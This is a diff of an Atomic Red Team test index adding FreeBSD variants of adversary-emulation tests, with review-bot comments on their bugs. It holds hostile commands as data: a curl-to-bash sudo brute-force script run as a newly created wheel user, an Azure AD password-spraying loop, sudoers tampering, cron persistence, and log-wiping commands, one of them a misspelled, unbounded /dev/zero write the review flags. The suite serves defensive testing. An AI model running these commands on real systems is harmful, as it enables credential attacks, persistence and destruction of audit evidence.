@@ -109901,7 +110183,8 @@ "Import-Module -Name AzureAD\n\nPassword1`n1q2w3e4r`nPassword! = \"Password1`n1q2w3e4r`nPassword!\".split(\"{`n}\")\nforeach($password in Password1`n1q2w3e4r`nPassword!) {\n $PWord = ConvertTo-SecureString -String \"$password\" -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contoso.com\", $Pword\n try {\n Write-Host \" [-] Attempting ${password} on account bruce.wayne@contoso.com.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] bruce.wayne@contoso.com:${password} are valid credentials!`r`n\"\n break\n } catch {\n Write-Host \" [-] bruce.wayne@contoso.com:${password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of bruteforce\"\n", "cd \"\\..\\ExternalPayloads\"\n.\\kerbrute.exe bruteuser --dc $ENV:userdnsdomain -d $ENV:userdomain $env:temp\\bruteuser.txt TestUser1 \n", "useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art\nsu art\ncd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash\n", - "useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art\nsu art\ncd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash\n" + "useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art\nsu art\ncd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash\n", + "pw adduser art -g wheel -s /bin/sh\necho \"password123\" | pw usermod art -h 0\nsu art\ncd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash\n" ], "commands": [], "queries": [], 
@@ -110095,6 +110378,35 @@ "command": "useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art\nsu art\ncd /tmp\ncurl -s #{remote_url} |bash\n", "cleanup_command": "userdel -fr art\n" } + }, + { + "name": "SUDO Brute Force - FreeBSD", + "auto_generated_guid": "abcde488-e083-4ee7-bc85-a5684edd7541", + "description": "An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. \n\nThis test creates the \"art\" user with a password of \"password123\", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "remote_url": { + "description": "url of remote payload", + "type": "url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if running on a FreeBSD based machine.\n", + "prereq_command": "if grep -iq \"FreeBSD\" /etc/os-release; then echo \"FreeBSD\"; else echo \"NOT FreeBSD\"; exit 1; fi\nif [ -x \"$(command -v openssl)\" ]; then echo \"openssl is installed\"; else echo \"openssl is NOT installed\"; exit 1; fi\nif [ -x \"$(command -v sudo)\" ]; then echo \"sudo is installed\"; else echo \"sudo is NOT installed\"; exit 1; fi\nif [ -x \"$(command -v curl)\" ]; then echo \"curl is installed\"; else echo \"curl is NOT installed\"; exit 1; fi\nif [ -x \"$(command -v bash)\" ]; then echo \"bash is installed\"; else echo \"bash is NOT installed\"; exit 1; fi\n", + "get_prereq_command": "pkg update && pkg 
install -y sudo curl bash\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": true, + "command": "pw adduser art -g wheel -s /bin/sh\necho \"password123\" | pw usermod art -h 0\nsu art\ncd /tmp\ncurl -s #{remote_url} |bash\n", + "cleanup_command": "rmuser -y art\n" + } } ] } @@ -141131,8 +141443,11 @@ ], "command_list": [ "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n", + "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n", "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers\nsudo visudo -c -f /etc/sudoers\n", - "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers" + "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers\nsudo visudo -c -f /usr/local/etc/sudoers\n", + "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers\n", + "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /usr/local/etc/sudoers\"\nsudo visudo -c -f /usr/local/etc/sudoers\n" ], "commands": [], "queries": [], @@ -141158,6 +141473,27 @@ "command": "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" } }, + { + "name": "Sudo usage (freebsd)", + "auto_generated_guid": "2bf9a018-4664-438a-b435-cc6f8c6f71b1", + "description": "Common Sudo enumeration methods.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if sudo is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v sudo)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y sudo)\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n" + } + }, { "name": "Unlimited sudo cache timeout", "auto_generated_guid": "a7b17659-dd5e-46f7-b7d1-e6792c91d0bc", 
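Review bot: In "SUDO Brute Force - FreeBSD" the `su art` line opens an interactive shell with no `-c`, so under a non-interactive runner the `cd`, `curl` and brute-force script run either in the invoking root context or not until `su` exits, never as `art`; the inherited Linux test has the same shape, but it is worth fixing here with `su art -c 'cd /tmp && curl -s #{remote_url} | bash'`. The prerequisite checks for `openssl` although the FreeBSD command never uses it (`pw usermod art -h 0` replaces `openssl passwd`), so that check is vestigial. The script is fetched from an unpinned `master` URL and piped straight into `bash` for a newly created wheel-group user, so pinning a commit or checking a hash upstream would keep the test from turning into a remote-code-execution vector if that path ever changes. I believe `/etc/os-release` only exists on FreeBSD from 13.0, so the platform check silently fails on older releases; `uname -s` is the safer probe.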
@@ -141172,6 +141508,27 @@ "command": "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers\nsudo visudo -c -f /etc/sudoers\n" } }, + { + "name": "Unlimited sudo cache timeout (freebsd)", + "auto_generated_guid": "a83ad6e8-6f24-4d7f-8f44-75f8ab742991", + "description": "Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if sudo is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v sudo)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y sudo)\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers\nsudo visudo -c -f /usr/local/etc/sudoers\n" + } + }, { "name": "Disable tty_tickets for sudo caching", "auto_generated_guid": "91a60b03-fb75-4d24-a42e-2eb8956e8de1", 
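Review bot: `sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers` does not work with BSD sed, where `-i` takes a mandatory backup-suffix argument: the substitution script is consumed as the suffix, the sudoers path is then parsed as the script, and nothing is edited. The PAM test in this same diff already uses the portable form, so write `sudo sed -i "" 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers`. The test also has no `cleanup_command`, so a successful run leaves an unlimited sudo credential cache on the host; `sudo sed -i "" 's/,timestamp_timeout=-1//' /usr/local/etc/sudoers && sudo visudo -c -f /usr/local/etc/sudoers` would revert it.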
@@ -141183,7 +141540,28 @@ "executor": { "name": "sh", "elevation_required": true, - "command": "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers" + "command": "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers\n" + } + }, + { + "name": "Disable tty_tickets for sudo caching (freebsd)", + "auto_generated_guid": "4df6a0fe-2bdd-4be8-8618-a6a19654a57a", + "description": "Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if sudo is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v sudo)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y sudo)\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /usr/local/etc/sudoers\"\nsudo visudo -c -f /usr/local/etc/sudoers\n" } } ] @@ -158881,6 +159259,7 @@ "command_list": [ "Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat\" -OutFile $env:TEMP\\discovery.bat\n", "curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > /tmp/T1074.001_discovery.log\n", + "curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > /tmp/T1074.001_discovery.log\n", "Compress-Archive -Path \"\\T1074.001\\bin\\Folder_to_zip\" -DestinationPath $env:TEMP\\Folder_to_zip.zip -Force\n", "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", 
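Review bot: "Disable tty_tickets for sudo caching (freebsd)" appends `Defaults !tty_tickets` to `/usr/local/etc/sudoers` and, like its Linux sibling, has no `cleanup_command`, so every run leaves another copy of a directive that lets a sudo timestamp obtained on one tty be reused from any other; add `cleanup_command: sudo sed -i "" '/^Defaults !tty_tickets$/d' /usr/local/etc/sudoers && sudo visudo -c -f /usr/local/etc/sudoers`. `visudo -c` only validates syntax after the append — if the write produced an invalid file, sudo is already broken and the check cannot undo it — which the description should say alongside its existing production warning.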
@@ -158940,6 +159319,33 @@
 "name": "bash"
 }
 },
+ {
+ "name": "Stage data from Discovery.sh (freebsd)",
+ "auto_generated_guid": "4fca7b49-379d-4493-8890-d6297750fa46",
+ "description": "Utilize curl to download discovery.sh and execute a basic information gathering shell script\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "input_arguments": {
+ "output_file": {
+ "description": "Location to save downloaded discovery.bat file",
+ "type": "path",
+ "default": "/tmp/T1074.001_discovery.log"
+ }
+ },
+ "dependency_executor_name": "sh",
+ "dependencies": [
+ {
+ "description": "Check if curl is installed.\n",
+ "prereq_command": "if [ ! -x \"$(command -v curl)\" ]; then exit 1; else exit 0; fi;\n",
+ "get_prereq_command": "(which pkg && pkg install -y curl)\n"
+ }
+ ],
+ "executor": {
+ "command": "curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file}\n",
+ "name": "sh"
+ }
+ },
 {
 "name": "Zip a Folder with PowerShell for Staging in Temp",
 "auto_generated_guid": "a57fbe4b-3440-452a-88a7-943531ac872a",
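Review bot: The `output_file` argument of the new 'Stage data from Discovery.sh (freebsd)' test is described as `Location to save downloaded discovery.bat file`, but the executor redirects the script's output into it and never saves a .bat; `"description": "Location to save the output of the executed discovery script"` matches what the command does. The `curl -s ... | sh -s` pipeline has no `-f`, so a non-2xx response body is still piped into `sh` and the test reports success; `curl -sf` fails the pipeline instead. There is also no `cleanup_command` removing `#{output_file}`, unlike other tests in this diff that write to /tmp and clean up with `rm -f #{output_file}`.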
@@ -177097,10 +177503,11 @@ ], "command_list": [ "cat /etc/passwd > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", - "sudo cat /etc/sudoers > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", - "grep 'x:0:' /etc/passwd > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt 2>/dev/null\n", + "if [ -f /etc/sudoers ]; then sudo cat /etc/sudoers > /tmp/T1087.001.txt; fi;\nif [ -f /usr/local/etc/sudoers ]; then sudo cat /usr/local/etc/sudoers > /tmp/T1087.001.txt; fi;\ncat /tmp/T1087.001.txt\n", + "grep 'x:0:' /etc/passwd > /tmp/T1087.001.txt\ngrep '*:0:' /etc/passwd >> /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt 2>/dev/null\n", "username=$(id -u -n) && lsof -u $username\n", "lastlog > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "lastlogin > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", "groups\nid\n", "dscl . list /Groups\ndscl . list /Users\ndscl . list /Users | grep -v '_'\ndscacheutil -q group\ndscacheutil -q user\n", "net user\ndir c:\\Users\\\ncmdkey.exe /list\nnet localgroup \"Users\"\nnet localgroup\n", @@ -177157,7 +177564,7 @@ } }, "executor": { - "command": "sudo cat /etc/sudoers > #{output_file}\ncat #{output_file}\n", + "command": "if [ -f /etc/sudoers ]; then sudo cat /etc/sudoers > #{output_file}; fi;\nif [ -f /usr/local/etc/sudoers ]; then sudo cat /usr/local/etc/sudoers > #{output_file}; fi;\ncat #{output_file}\n", "cleanup_command": "rm -f #{output_file}\n", "name": "sh", "elevation_required": true @@ -177179,7 +177586,7 @@ } }, "executor": { - "command": "grep 'x:0:' /etc/passwd > #{output_file}\ncat #{output_file} 2>/dev/null\n", + "command": "grep 'x:0:' /etc/passwd > #{output_file}\ngrep '*:0:' /etc/passwd >> #{output_file}\ncat #{output_file} 2>/dev/null\n", "cleanup_command": "rm -f #{output_file} 2>/dev/null\n", "name": "sh" } 
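Review bot: In the sudoers executor of the `@@ -177157` hunk, the second conditional writes `/usr/local/etc/sudoers` with `>` and so discards whatever the first conditional captured from `/etc/sudoers` when both files exist; `if [ -f /usr/local/etc/sudoers ]; then sudo cat /usr/local/etc/sudoers >> #{output_file}; fi;` keeps both, and the pre-rendered copy in the `command_list` hunk above it needs the same change. The grep executor in the last hunk adds `grep '*:0:' /etc/passwd`; a leading `*` is literal in a basic regex, so this matches the `root:*:0:0` form FreeBSD uses in /etc/passwd as presumably intended, but a short note in the description would stop the next reader from taking it for a wildcard.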
@@ -177201,7 +177608,7 @@
 {
 "description": "check if lsof exists\n",
 "prereq_command": "which lsof\n",
- "get_prereq_command": "(which yum && yum -y install lsof)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)\n"
+ "get_prereq_command": "(which pkg && pkg install -y lsof)||(which yum && yum -y install lsof)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)\n"
 }
 ]
 },
@@ -177233,6 +177640,26 @@
 "name": "sh"
 }
 },
+ {
+ "name": "Show if a user account has ever logged in remotely (freebsd)",
+ "auto_generated_guid": "0f73418f-d680-4383-8a24-87bc97fe4e35",
+ "description": "Show if a user account has ever logged in remotely\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "input_arguments": {
+ "output_file": {
+ "description": "Path where captured results will be placed",
+ "type": "path",
+ "default": "/tmp/T1087.001.txt"
+ }
+ },
+ "executor": {
+ "command": "lastlogin > #{output_file}\ncat #{output_file}\n",
+ "cleanup_command": "rm -f #{output_file}\n",
+ "name": "sh"
+ }
+ },
 {
 "name": "Enumerate users and groups",
 "auto_generated_guid": "e6f36545-dc1e-47f0-9f48-7f730f54a02e",
@@ -179240,23 +179667,21 @@
 "id": "attack-pattern--27960489-4e7f-461d-a62a-f5c0cb521e4a",
 "name": "Application Access Token",
 "created": "2019-08-30T12:55:58.607Z",
- "modified": "2021-09-20T16:50:41.832Z",
+ "modified": "2023-11-02T15:39:10.534Z",
 "type": "attack-pattern",
 "x_mitre_data_sources": [],
 "x_mitre_contributors": [
- "Jen Burns, HubSpot",
 "Mark Wee",
 "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
 "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)",
- "Shailesh Tiwary (Indian Army)"
+ "Shailesh Tiwary (Indian Army)",
+ "Jack Burns, HubSpot"
 ],
 "x_mitre_impact_type": [],
 "x_mitre_deprecated": false,
 "x_mitre_effective_permissions": [],
 "x_mitre_remote_support": false,
- "x_mitre_permissions_required": [
- "User"
- ],
+ "x_mitre_permissions_required": [],
 "x_mitre_is_subtechnique": false,
 "x_mitre_detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications. Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.",
 "x_mitre_defense_bypassed": [
@@ -179264,7 +179689,7 @@
 "Logon Credentials"
 ],
 "x_mitre_system_requirements": [],
- "x_mitre_attack_spec_version": "",
+ "x_mitre_attack_spec_version": "3.2.0",
 "revoked": true,
 "object_marking_refs": [
 "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
@@ -179282,18 +179707,18 @@
 "external_id": "",
 "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019."
 },
- {
- "source_name": "okta",
- "url": "https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen",
- "external_id": "",
- "description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019."
- },
 {
 "source_name": "Microsoft Identity Platform Access 2019",
 "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens",
 "external_id": "",
 "description": "Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019."
 },
+ {
+ "source_name": "okta",
+ "url": "https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen",
+ "external_id": "",
+ "description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019."
+ },
 {
 "source_name": "Staaldraad Phishing with OAuth 2017",
 "url": "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/",
@@ -186318,6 +186743,7 @@
 ],
 "command_list": [
 "if (systemd-detect-virt) then echo \"Virtualization Environment detected\"; fi;\nif (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo \"Virtualization Environment detected\"; fi;\n",
+ "if [ \"$(sysctl -n hw.hv_vendor)\" != \"\" ]; then echo \"Virtualization Environment detected\"; fi\n",
 "$error.clear()\nGet-WmiObject -Query \"SELECT * FROM MSAcpi_ThermalZoneTemperature\" -ErrorAction SilentlyContinue\nif($error) {echo \"Virtualization Environment detected\"}\n",
 "if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;\n",
 "$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Manufacturer\"\n$Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Model\"\nif((($Manufacturer.ToLower() -eq \"microsoft corporation\") -and ($Model.ToLower().contains(\"virtual\"))) -or ($Manufacturer.ToLower().contains(\"vmware\")) -or ($Model.ToLower() -eq \"virtualbox\")) {write-host \"Virtualization environment detected!\"} else {write-host \"No virtualization environment detected!\"}\n",
@@ -186348,6 +186774,19 @@ "command": "if (systemd-detect-virt) then echo \"Virtualization Environment detected\"; fi;\nif (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo \"Virtualization Environment detected\"; fi;\n" } }, + { + "name": "Detect Virtualization Environment (FreeBSD)", + "auto_generated_guid": "e129d73b-3e03-4ae9-bf1e-67fc8921e0fd", + "description": "Detects execution in a virtualized environment.\nAt boot, dmesg stores a log if a hypervisor is detected.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "if [ \"$(sysctl -n hw.hv_vendor)\" != \"\" ]; then echo \"Virtualization Environment detected\"; fi\n" + } + }, { "name": "Detect Virtualization Environment (Windows)", "auto_generated_guid": "502a7dc4-9d6f-4d28-abf2-f0e84692562d", @@ -186770,6 +187209,7 @@ "command_list": [ "crontab -l > /tmp/notevil\necho \"* * * * * /tmp/evil.sh\" > /tmp/persistevil && crontab /tmp/persistevil\n", "echo \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.daily/persistevil\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.hourly/persistevil\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.monthly/persistevil\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.weekly/persistevil\n", + "echo \"echo '*/5 * * * * root echo \"Hello from Atomic Red Team\"' > /tmp/atomic.log\" > /etc/cron.d/persistevil\n", "echo \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" >> /var/spool/cron/crontabs/persistevil\n" ], "commands": [], 
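Review bot: The description of 'Detect Virtualization Environment (FreeBSD)' says `At boot, dmesg stores a log if a hypervisor is detected`, but the executor reads `sysctl -n hw.hv_vendor` and never consults dmesg, so the text documents a different check than the one performed; `"description": "Detects execution in a virtualized environment.\nOn FreeBSD the hw.hv_vendor sysctl is non-empty when the kernel detected a hypervisor at boot.\n"` describes the command as written. `elevation_required` is `true`, yet reading that sysctl should not need privilege, so the flag only forces an unnecessary sudo prompt; `"elevation_required": false` is enough unless a host is found where the node is restricted.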
@@ -186787,8 +187227,8 @@ "auto_generated_guid": "435057fb-74b1-410e-9403-d81baf194f75", "description": "This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "command": { @@ -186803,7 +187243,7 @@ } }, "executor": { - "name": "bash", + "name": "sh", "command": "crontab -l > /tmp/notevil\necho \"* * * * * #{command}\" > #{tmp_cron} && crontab #{tmp_cron}\n", "cleanup_command": "crontab /tmp/notevil\n" } @@ -186835,6 +187275,32 @@ "cleanup_command": "rm /etc/cron.daily/#{cron_script_name}\nrm /etc/cron.hourly/#{cron_script_name}\nrm /etc/cron.monthly/#{cron_script_name}\nrm /etc/cron.weekly/#{cron_script_name}\n" } }, + { + "name": "Cron - Add script to /etc/cron.d folder", + "auto_generated_guid": "078e69eb-d9fb-450e-b9d0-2e118217c846", + "description": "This test adds a script to /etc/cron.d folder configured to execute on a schedule.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "command": { + "description": "Command to execute", + "type": "string", + "default": "echo '*/5 * * * * root echo \"Hello from Atomic Red Team\"' > /tmp/atomic.log" + }, + "cron_script_name": { + "description": "Name of file to store in cron folder", + "type": "string", + "default": "persistevil" + } + }, + "executor": { + "elevation_required": true, + "name": "sh", + "command": "echo \"#{command}\" > /etc/cron.d/#{cron_script_name}\n", + "cleanup_command": "rm /etc/cron.d/#{cron_script_name}\n" + } + }, { "name": "Cron - Add script to /var/spool/cron/crontabs/ folder", "auto_generated_guid": "2d943c18-e74a-44bf-936f-25ade6cccab4", 
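Review bot: The 'Cron - Add script to /etc/cron.d folder' test in the `@@ -186835` hunk does not produce a valid cron.d entry: the default `command` is itself a shell command (`echo '*/5 * * * * root echo "Hello from Atomic Red Team"' > /tmp/atomic.log`) and the executor wraps it as `echo "#{command}" > /etc/cron.d/#{cron_script_name}`, so the file dropped into /etc/cron.d holds an `echo ... > /tmp/atomic.log` line instead of a `minute hour dom month dow user command` entry, and the inner double quotes also terminate the executor's outer quotes. Cron rejects such a file, so the persistence the test is meant to exercise never fires. Keep the schedule in the executor and only the payload in the argument: default `echo 'Hello from Atomic Red Team' > /tmp/atomic.log` and executor `echo \"*/5 * * * * root #{command}\" > /etc/cron.d/#{cron_script_name}`. The pre-rendered copy in the `command_list` hunk at the end of the previous line has the same problem.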
@@ -191154,13 +191620,18 @@ ], "command_list": [ "sudo rm -rf /var/log/system.log\nif [ -d /var/audit ] ; then sudo rm -rf /var/audit/20220725213300.202208110700021 ; fi\n", + "rm -rf /var/log/messages\nrm -rf /var/log/security\n", "sudo log erase --all\nsudo log erase --ttl #Deletes only time-to-live log content\n", "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo truncate --size=0 /var/log/system.log #size parameter \n", + "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate --size=0 /var/log/security #size parameter \n", "sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes\nsudo dd if=/dev/zero bs=1000 count=5 of=/var/log/system.log #log file filled with null bytes(zeros)\n", + "cat /dev/null > /var/log/messages #truncating the file to zero bytes\ncat /dev/zero > /var/lol/messages #log file filled with null bytes(zeros)\n", "sudo find /var/log -name 'system.log.*' -exec rm {} \\; #using \"rm\" execution\nsudo find /var/log/ -name \"system.log.97.gz.*\" -exec shred -u -z -n 3 {} \\; #using \"shred\" execution\nsudo find /var/log/ -name \"system.log.98.gz.*\" -exec unlink {} \\; #using \"unlink\" execution\n", "sudo echo '' > /var/log/system.log\n", + "echo '' > /var/log/messages\n", "sudo log -f /var/log/system.log | : > /var/log/system.log\n", "sudo unlink /var/log/system.log\n", + "unlink /var/log/messages\n", "sudo shred -u -z -n 3 /var/log/system.log\n", "sudo srm /var/log/system.log #system log file deletion\nsudo srm -r /var/log/ #recursive deletion of log files\n", "osascript -e 'do shell script \"rm /var/log/system.log\" with administrator privileges'\n", 
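Review bot: The new `cat /dev/null > /var/log/messages ...\ncat /dev/zero > /var/lol/messages` entry has two problems: the path is misspelled (`/var/lol/` for `/var/log/`), so it creates a stray file instead of touching the log, and `cat /dev/zero` redirected into a file never terminates — it writes until the filesystem is full, which is a denial of service against the test host. The macOS/Linux variant a few lines above bounds this with `dd if=/dev/zero bs=1000 count=5 of=/var/log/system.log`; `dd if=/dev/zero bs=1000 count=5 of=/var/log/messages` keeps the intent of the test. The same string is the executor of the '(freebsd)' cat test in the `@@ -191282` hunk two lines below and needs the same fix.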
@@ -191174,10 +191645,10 @@ "parsed_datasets": [ { "source": "atomics/T1070.002/T1070.002.yaml", - "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Linux or Mac System Logs", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs", "content": { "attack_technique": "T1070.002", - "display_name": "Indicator Removal on Host: Clear Linux or Mac System Logs", + "display_name": "Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs", "atomic_tests": [ { "name": "rm -rf", @@ -191213,6 +191684,19 @@ "elevation_required": true } }, + { + "name": "rm -rf", + "auto_generated_guid": "bd8ccc45-d632-481e-b7cf-c467627d68f9", + "description": "Delete messages and security logs\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "rm -rf /var/log/messages\nrm -rf /var/log/security\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Delete log files using built-in log utility", "auto_generated_guid": "653d39cd-bae7-499a-898c-9fb96b8b5cd1", @@ -191254,6 +191738,19 @@ "elevation_required": true } }, + { + "name": "Truncate system log files via truncate utility (freebsd)", + "auto_generated_guid": "14033063-ee04-4eaf-8f5d-ba07ca7a097c", + "description": "This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate --size=0 /var/log/security #size parameter \n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Delete log files via cat utility by appending /dev/null or /dev/zero", "auto_generated_guid": "c23bdb88-928d-493e-b46d-df2906a50941", 
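Review bot: The FreeBSD test added in the `@@ -191213` hunk is named `rm -rf`, identical to the existing Linux/macOS test it follows, while every other FreeBSD addition in this file carries a `(freebsd)` suffix; `"name": "rm -rf (freebsd)"` keeps the naming consistent and lets a test be selected by name unambiguously. Its description `Delete messages and security logs` could also say which files, e.g. `Delete /var/log/messages and /var/log/security`, as the executor makes clear.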
@@ -191282,6 +191779,19 @@ "elevation_required": true } }, + { + "name": "Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)", + "auto_generated_guid": "369878c6-fb04-48d6-8fc2-da9d97b3e054", + "description": "The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "cat /dev/null > /var/log/messages #truncating the file to zero bytes\ncat /dev/zero > /var/lol/messages #log file filled with null bytes(zeros)\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "System log file deletion via find utility", "auto_generated_guid": "bc8eeb4a-cc3e-45ec-aa6e-41e973da2558", @@ -191340,6 +191850,19 @@ "elevation_required": true } }, + { + "name": "Overwrite FreeBSD system log via echo utility", + "auto_generated_guid": "11cb8ee1-97fb-4960-8587-69b8388ee9d9", + "description": "This test overwrites the contents of system log file with an empty string using echo utility\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "echo '' > /var/log/messages\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Real-time system log clearance/deletion", 